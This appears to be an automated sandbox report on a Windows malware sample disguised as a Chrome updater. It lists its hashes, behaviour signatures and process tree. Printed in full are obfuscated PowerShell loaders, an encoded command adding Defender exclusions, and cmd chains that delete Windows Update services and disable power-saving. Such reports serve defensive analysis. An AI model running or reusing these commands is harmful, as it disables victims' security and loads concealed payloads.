Analysis
-
max time kernel
120s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
14-08-2024 18:22
Static task
static1
Behavioral task
behavioral1
Sample
40eeb7e6dc706f7e0eac78cc85213220N.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
40eeb7e6dc706f7e0eac78cc85213220N.exe
Resource
win10v2004-20240802-en
General
-
Target
40eeb7e6dc706f7e0eac78cc85213220N.exe
-
Size
4.8MB
-
MD5
40eeb7e6dc706f7e0eac78cc85213220
-
SHA1
28b55166002c4ba1c9af0ec4fd9f98b591d6e498
-
SHA256
9709d21f40cd1def7d6bb809d5e11fa948ec7290e201ae2b2a62e1bd17368548
-
SHA512
219713374a9bbaf254fd88f1834ca82fec95228b8de3890a466079866026491381caacd4309a9b7ab278cd5e92097fdee5105bbdbddc6c0b6743a6f871f6060f
-
SSDEEP
98304:Ch5ZFrrBPngTB+XSOSp+yBmv1b4b4V+khcwhrkAkuRNSo:CTZFr5gT0XvyBmd4MsocFVuJ
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 952 created 408 952 powershell.EXE winlogon.exe PID 1344 created 408 1344 powershell.EXE winlogon.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exepid process 824 icacls.exe 2364 takeown.exe 2608 icacls.exe 2052 takeown.exe -
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
services.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinRing0_1_2_0\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Roaming\\Google\\Libs\\WR64.sys" services.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 2104 updater.exe -
Loads dropped DLL 1 IoCs
Processes:
taskeng.exepid process 2404 taskeng.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 2364 takeown.exe 2608 icacls.exe 2052 takeown.exe 824 icacls.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 4 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Power Settings 1 TTPs 10 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
cmd.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.execmd.exepowercfg.exepowercfg.exepid process 2856 cmd.exe 2764 powercfg.exe 1688 powercfg.exe 2648 powercfg.exe 2792 powercfg.exe 2652 powercfg.exe 884 powercfg.exe 2784 cmd.exe 2296 powercfg.exe 2016 powercfg.exe -
Drops file in System32 directory 4 IoCs
Processes:
powershell.exepowershell.exepowershell.EXEpowershell.EXEdescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 4 IoCs
Processes:
40eeb7e6dc706f7e0eac78cc85213220N.exepowershell.EXEpowershell.EXEupdater.exedescription pid process target process PID 1360 set thread context of 1936 1360 40eeb7e6dc706f7e0eac78cc85213220N.exe conhost.exe PID 952 set thread context of 1948 952 powershell.EXE dllhost.exe PID 1344 set thread context of 1956 1344 powershell.EXE dllhost.exe PID 2104 set thread context of 2452 2104 updater.exe dialer.exe -
Drops file in Windows directory 7 IoCs
Processes:
svchost.execonhost.exedescription ioc process File opened for modification C:\Windows\Tasks\dialersvc32.job svchost.exe File created C:\Windows\Tasks\dialersvc32.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc32.job conhost.exe File created C:\Windows\Tasks\dialersvc64.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc64.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc64.job svchost.exe File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf svchost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 3004 sc.exe 2924 sc.exe 1616 sc.exe 2936 sc.exe 2760 sc.exe 2676 sc.exe 2172 sc.exe 2912 sc.exe 1204 sc.exe 2420 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.EXEdllhost.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
powershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 00508b0a77eeda01 powershell.EXE -
Modifies registry key 1 TTPs 14 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 2636 reg.exe 2980 reg.exe 2780 reg.exe 1556 reg.exe 2528 reg.exe 1724 reg.exe 264 reg.exe 1276 reg.exe 532 reg.exe 2172 reg.exe 2528 reg.exe 2616 reg.exe 2684 reg.exe 2692 reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exe40eeb7e6dc706f7e0eac78cc85213220N.exepowershell.EXEdllhost.exepowershell.EXEpowershell.exepid process 2092 powershell.exe 1360 40eeb7e6dc706f7e0eac78cc85213220N.exe 952 powershell.EXE 952 powershell.EXE 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1344 powershell.EXE 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 2904 powershell.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe 1948 dllhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
services.exepid process 460 services.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe40eeb7e6dc706f7e0eac78cc85213220N.exetakeown.exepowershell.EXEdllhost.exepowershell.EXEsvchost.exepowershell.exedllhost.exeupdater.exepowercfg.exepowercfg.exepowercfg.exeExplorer.EXEpowercfg.exedialer.exedescription pid process Token: SeDebugPrivilege 2092 powershell.exe Token: SeShutdownPrivilege 2648 powercfg.exe Token: SeShutdownPrivilege 2296 powercfg.exe Token: SeShutdownPrivilege 2792 powercfg.exe Token: SeShutdownPrivilege 2652 powercfg.exe Token: SeDebugPrivilege 1360 40eeb7e6dc706f7e0eac78cc85213220N.exe Token: SeTakeOwnershipPrivilege 2052 takeown.exe Token: SeDebugPrivilege 952 powershell.EXE Token: SeDebugPrivilege 952 powershell.EXE Token: SeDebugPrivilege 1948 dllhost.exe Token: SeDebugPrivilege 1344 powershell.EXE Token: SeAuditPrivilege 836 svchost.exe Token: SeDebugPrivilege 2904 powershell.exe Token: SeDebugPrivilege 1344 powershell.EXE Token: SeDebugPrivilege 1956 dllhost.exe Token: SeDebugPrivilege 2104 updater.exe Token: SeAssignPrimaryTokenPrivilege 836 svchost.exe Token: SeIncreaseQuotaPrivilege 836 svchost.exe Token: SeSecurityPrivilege 836 svchost.exe Token: SeTakeOwnershipPrivilege 836 svchost.exe Token: SeLoadDriverPrivilege 836 svchost.exe Token: SeSystemtimePrivilege 836 svchost.exe Token: SeBackupPrivilege 836 svchost.exe Token: SeRestorePrivilege 836 svchost.exe Token: SeShutdownPrivilege 836 svchost.exe Token: SeSystemEnvironmentPrivilege 836 svchost.exe Token: SeUndockPrivilege 836 svchost.exe Token: SeManageVolumePrivilege 836 svchost.exe Token: SeShutdownPrivilege 2764 powercfg.exe Token: SeShutdownPrivilege 2016 powercfg.exe Token: SeAssignPrimaryTokenPrivilege 836 svchost.exe Token: SeIncreaseQuotaPrivilege 836 svchost.exe Token: SeSecurityPrivilege 836 svchost.exe Token: SeTakeOwnershipPrivilege 836 svchost.exe Token: SeLoadDriverPrivilege 836 svchost.exe Token: SeSystemtimePrivilege 836 svchost.exe Token: SeBackupPrivilege 836 svchost.exe Token: SeRestorePrivilege 836 svchost.exe Token: SeShutdownPrivilege 836 svchost.exe Token: SeSystemEnvironmentPrivilege 836 svchost.exe Token: SeUndockPrivilege 836 svchost.exe Token: SeManageVolumePrivilege 836 svchost.exe Token: SeShutdownPrivilege 884 powercfg.exe Token: SeAssignPrimaryTokenPrivilege 836 svchost.exe Token: SeIncreaseQuotaPrivilege 836 svchost.exe Token: SeSecurityPrivilege 836 svchost.exe Token: SeTakeOwnershipPrivilege 836 svchost.exe Token: SeLoadDriverPrivilege 836 svchost.exe Token: SeSystemtimePrivilege 836 svchost.exe Token: SeBackupPrivilege 836 svchost.exe Token: SeRestorePrivilege 836 svchost.exe Token: SeShutdownPrivilege 836 svchost.exe Token: SeSystemEnvironmentPrivilege 836 svchost.exe Token: SeUndockPrivilege 836 svchost.exe Token: SeManageVolumePrivilege 836 svchost.exe Token: SeShutdownPrivilege 1352 Explorer.EXE Token: SeShutdownPrivilege 1688 powercfg.exe Token: SeLockMemoryPrivilege 2452 dialer.exe Token: SeLockMemoryPrivilege 2452 dialer.exe Token: SeAssignPrimaryTokenPrivilege 836 svchost.exe Token: SeIncreaseQuotaPrivilege 836 svchost.exe Token: SeSecurityPrivilege 836 svchost.exe Token: SeTakeOwnershipPrivilege 836 svchost.exe Token: SeLoadDriverPrivilege 836 svchost.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
dialer.exepid process 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
dialer.exepid process 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe 2452 dialer.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
conhost.execonhost.exepid process 2696 conhost.exe 2988 conhost.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
svchost.exepid process 836 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
40eeb7e6dc706f7e0eac78cc85213220N.execmd.execmd.exedescription pid process target process PID 1360 wrote to memory of 2092 1360 40eeb7e6dc706f7e0eac78cc85213220N.exe powershell.exe PID 1360 wrote to memory of 2092 1360 40eeb7e6dc706f7e0eac78cc85213220N.exe powershell.exe PID 1360 wrote to memory of 2092 1360 40eeb7e6dc706f7e0eac78cc85213220N.exe powershell.exe PID 1360 wrote to memory of 2756 1360 40eeb7e6dc706f7e0eac78cc85213220N.exe cmd.exe PID 1360 wrote to memory of 2756 1360 40eeb7e6dc706f7e0eac78cc85213220N.exe cmd.exe PID 1360 wrote to memory of 2756 1360 40eeb7e6dc706f7e0eac78cc85213220N.exe cmd.exe PID 1360 wrote to memory of 2784 1360 40eeb7e6dc706f7e0eac78cc85213220N.exe cmd.exe PID 1360 wrote to memory of 2784 1360 40eeb7e6dc706f7e0eac78cc85213220N.exe cmd.exe PID 1360 wrote to memory of 2784 1360 40eeb7e6dc706f7e0eac78cc85213220N.exe cmd.exe PID 2756 wrote to memory of 2936 2756 cmd.exe sc.exe PID 2756 wrote to memory of 2936 2756 cmd.exe sc.exe PID 2756 wrote to memory of 2936 2756 cmd.exe sc.exe PID 2784 wrote to memory of 2648 2784 cmd.exe powercfg.exe PID 2784 wrote to memory of 2648 2784 cmd.exe powercfg.exe PID 2784 wrote to memory of 2648 2784 cmd.exe powercfg.exe PID 2756 wrote to memory of 3004 2756 cmd.exe sc.exe PID 2756 wrote to memory of 3004 2756 cmd.exe sc.exe PID 2756 wrote to memory of 3004 2756 cmd.exe sc.exe PID 2784 wrote to memory of 2296 2784 cmd.exe powercfg.exe PID 2784 wrote to memory of 2296 2784 cmd.exe powercfg.exe PID 2784 wrote to memory of 2296 2784 cmd.exe powercfg.exe PID 2756 wrote to memory of 2760 2756 cmd.exe sc.exe PID 2756 wrote to memory of 2760 2756 cmd.exe sc.exe PID 2756 wrote to memory of 2760 2756 cmd.exe sc.exe PID 2756 wrote to memory of 2924 2756 cmd.exe sc.exe PID 2756 wrote to memory of 2924 2756 cmd.exe sc.exe PID 2756 wrote to memory of 2924 2756 cmd.exe sc.exe PID 2784 wrote to memory of 2792 2784 cmd.exe powercfg.exe PID 2784 wrote to memory of 2792 2784 cmd.exe powercfg.exe PID 2784 wrote to memory of 2792 2784 cmd.exe powercfg.exe PID 2756 wrote to memory of 2676 2756 cmd.exe sc.exe PID 2756 wrote to memory of 2676 2756 cmd.exe sc.exe PID 2756 wrote to memory of 2676 2756 cmd.exe sc.exe PID 2756 wrote to memory of 2616 2756 cmd.exe reg.exe PID 2756 wrote to memory of 2616 2756 cmd.exe reg.exe PID 2756 wrote to memory of 2616 2756 cmd.exe reg.exe PID 2756 wrote to memory of 2636 2756 cmd.exe reg.exe PID 2756 wrote to memory of 2636 2756 cmd.exe reg.exe PID 2756 wrote to memory of 2636 2756 cmd.exe reg.exe PID 2784 wrote to memory of 2652 2784 cmd.exe powercfg.exe PID 2784 wrote to memory of 2652 2784 cmd.exe powercfg.exe PID 2784 wrote to memory of 2652 2784 cmd.exe powercfg.exe PID 2756 wrote to memory of 2684 2756 cmd.exe reg.exe PID 2756 wrote to memory of 2684 2756 cmd.exe reg.exe PID 2756 wrote to memory of 2684 2756 cmd.exe reg.exe PID 2756 wrote to memory of 2692 2756 cmd.exe reg.exe PID 2756 wrote to memory of 2692 2756 cmd.exe reg.exe PID 2756 wrote to memory of 2692 2756 cmd.exe reg.exe PID 2756 wrote to memory of 2528 2756 cmd.exe reg.exe PID 2756 wrote to memory of 2528 2756 cmd.exe reg.exe PID 2756 wrote to memory of 2528 2756 cmd.exe reg.exe PID 2756 wrote to memory of 2052 2756 cmd.exe takeown.exe PID 2756 wrote to memory of 2052 2756 cmd.exe takeown.exe PID 2756 wrote to memory of 2052 2756 cmd.exe takeown.exe PID 2756 wrote to memory of 824 2756 cmd.exe icacls.exe PID 2756 wrote to memory of 824 2756 cmd.exe icacls.exe PID 2756 wrote to memory of 824 2756 cmd.exe icacls.exe PID 2756 wrote to memory of 2980 2756 cmd.exe reg.exe PID 2756 wrote to memory of 2980 2756 cmd.exe reg.exe PID 2756 wrote to memory of 2980 2756 cmd.exe reg.exe PID 2756 wrote to memory of 1276 2756 cmd.exe reg.exe PID 2756 wrote to memory of 1276 2756 cmd.exe reg.exe PID 2756 wrote to memory of 1276 2756 cmd.exe reg.exe PID 2756 wrote to memory of 1724 2756 cmd.exe reg.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:408
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{cbe60bff-e555-4475-bc84-4afd6cf62758}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1948
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{037cba3c-de0e-40c6-82ba-f4de163d725c}2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1956
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
- Sets service image path in registry
- Suspicious behavior: LoadsDriver
PID:460 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:584
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:1248
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:664
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵PID:752
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:796
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1288
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:836 -
C:\Windows\system32\taskeng.exetaskeng.exe {72413DC2-2A6C-4540-B344-0104681548B4} S-1-5-18:NT AUTHORITY\System:Service:3⤵PID:1132
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:952
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {B9FA45F4-EB0A-4D77-B31A-B0F05C23D11D} S-1-5-21-2212144002-1172735686-1556890956-1000:MVFYZPLM\Admin:Interactive:[1]3⤵
- Loads dropped DLL
PID:2404 -
C:\Users\Admin\Google\Chrome\updater.exeC:\Users\Admin\Google\Chrome\updater.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2104 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAeAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAdwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHcAbgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYQBnAHMAIwA+AA=="5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2904
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵PID:1224
-
C:\Windows\system32\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
PID:2172
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
PID:2912
-
-
C:\Windows\system32\sc.exesc stop wuauserv6⤵
- Launches sc.exe
PID:1616
-
-
C:\Windows\system32\sc.exesc stop bits6⤵
- Launches sc.exe
PID:1204
-
-
C:\Windows\system32\sc.exesc stop dosvc6⤵
- Launches sc.exe
PID:2420
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f6⤵
- Modifies registry key
PID:264
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f6⤵
- Modifies registry key
PID:2780
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f6⤵
- Modifies registry key
PID:1556
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f6⤵
- Modifies registry key
PID:2172
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f6⤵
- Modifies registry key
PID:2528
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2364
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 05⤵
- Power Settings
PID:2856 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:884
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1688
-
-
-
